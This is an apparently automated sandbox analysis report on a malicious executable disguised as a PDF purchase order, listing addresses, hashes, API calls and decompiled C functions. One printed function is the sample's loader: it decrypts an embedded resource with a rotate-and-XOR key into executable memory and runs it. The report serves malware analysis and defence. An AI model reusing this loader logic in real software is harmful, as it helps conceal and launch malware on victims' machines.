0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNEL32(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 024507DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 024507F7

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
Instruction ID: c33e648b84fbaa2503fdc8958275025bfdb0f0235235a6cd80478d8b95f76a18
Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
Instruction Fuzzy Hash: BEF0A775D1411CABDB08E6B89845ABE77ACDF0C300F10556EDE56E2241D538854186A0

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Alvin\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Alvin\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x46
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
lstrlenW.KERNEL32(Fosklcks,?,?,?,Fosklcks,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75543420), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,Fosklcks,?,?,?,Fosklcks,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(Fosklcks,?,00000000,?), ref: 00403E36
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32(00429200), ref: 00403EBC
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
RegisterClassW.USER32(00429200), ref: 00403F81
DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0

Strings

Fosklcks, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
.DEFAULT\Control Panel\International, xrefs: 00403D83
RichEdit20W, xrefs: 00403F63, 00403F69
RichEd32, xrefs: 00403F53
_Nb, xrefs: 00403E9B, 00403F03
C:\Users\user\AppData\Local\Temp, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEdit, xrefs: 00403F72
1033, xrefs: 00403D37, 00403D93
RichEd20, xrefs: 00403F45
H7B, xrefs: 00403D43
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
.exe, xrefs: 00403E25

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Fosklcks$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-880617333
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 100010B0 Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E100010B0() {
				signed int _v5;
				signed char _v6;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				signed int _v28;
				intOrPtr _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				intOrPtr _v44;
				_Unknown_base(*)()* _v48;
				_Unknown_base(*)()* _v52;
				intOrPtr _v56;
				WCHAR* _v60;
				_Unknown_base(*)()* _v64;
				void* _t70;

				_v12 = 0;
				_v28 = 0;
				_v60 = "iowrqocqoefza";
				_v64 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetModuleHandleExW");
				_v36 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "FindResourceW");
				_v40 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "LoadResource");
				_v48 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "LockResource");
				_v52 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "SizeofResource");
				_v20 = E10001000();
				_v32 = _v36(_v20, 1, 0xa);
				_v44 = _v40(_v20, _v32);
				_v56 = _v48(_v44);
				_v24 = _v52(_v20, _v32);
				_t70 = VirtualAlloc(0, _v24, 0x1000, 0x40); // executed
				_v16 = _t70;
				E10001040(_v16, _v56, _v24);
				_v12 = 0;
				while(_v12 < _v24) {
					_v5 =  *((intOrPtr*)(_v16 + _v12));
					_v6 =  *((intOrPtr*)(_v60 + _v28));
					 *((char*)(_v16 + _v12)) = ((_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005) ^ _v6 & 0x000000ff;
					asm("cdq");
					_v28 = (_v28 + 1) % 0xd;
					_v12 = _v12 + 1;
				}
				goto __eax;
			}

0x100010b6
0x100010bd
0x100010c4
0x100010e2
0x100010fc
0x10001116
0x10001130
0x1000114a
0x10001152
0x10001160
0x1000116e
0x10001178
0x10001186
0x10001196
0x1000119c
0x100011ab
0x100011b0
0x100011c2
0x100011d2
0x100011dd
0x100011fc
0x10001204
0x1000120c
0x100011bf
0x100011bf
0x10001214

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 100010D5
GetProcAddress.KERNEL32(00000000), ref: 100010DC
GetModuleHandleW.KERNEL32(Kernel32.dll,FindResourceW), ref: 100010EF
GetProcAddress.KERNEL32(00000000), ref: 100010F6
GetModuleHandleW.KERNEL32(Kernel32.dll,LoadResource), ref: 10001109
GetProcAddress.KERNEL32(00000000), ref: 10001110
GetModuleHandleW.KERNEL32(Kernel32.dll,LockResource), ref: 10001123
GetProcAddress.KERNEL32(00000000), ref: 1000112A
GetModuleHandleW.KERNEL32(Kernel32.dll,SizeofResource), ref: 1000113D
GetProcAddress.KERNEL32(00000000), ref: 10001144

Part of subcall function 10001000: GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 10001017
Part of subcall function 10001000: GetProcAddress.KERNEL32(00000000), ref: 1000101E

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 10001196

Strings

Kernel32.dll, xrefs: 100010EA
Kernel32.dll, xrefs: 100010D0
SizeofResource, xrefs: 10001133
Kernel32.dll, xrefs: 10001104
LockResource, xrefs: 10001119
Kernel32.dll, xrefs: 10001138
GetModuleHandleExW, xrefs: 100010CB
FindResourceW, xrefs: 100010E5
Kernel32.dll, xrefs: 1000111E
LoadResource, xrefs: 100010FF

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: AddressHandleModuleProc$AllocVirtual
String ID: FindResourceW$GetModuleHandleExW$Kernel32.dll$Kernel32.dll$Kernel32.dll$Kernel32.dll$Kernel32.dll$LoadResource$LockResource$SizeofResource
API String ID: 4195448317-78656208
Opcode ID: 69403377347bbd4cdb434f607d950d9fa058b09a5ee6e180100960d444137025
Instruction ID: 6da75c6d9eaa9837a3e736521a0478219455c01626f3678f946e2346b0ecdfb3
Opcode Fuzzy Hash: 69403377347bbd4cdb434f607d950d9fa058b09a5ee6e180100960d444137025
Instruction Fuzzy Hash: DA41E0B4D04218AFEF14DFE4C888AEEBBB5FF48381F108459F651B3248C7349A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\Alvin\\Desktop", L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\Alvin\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
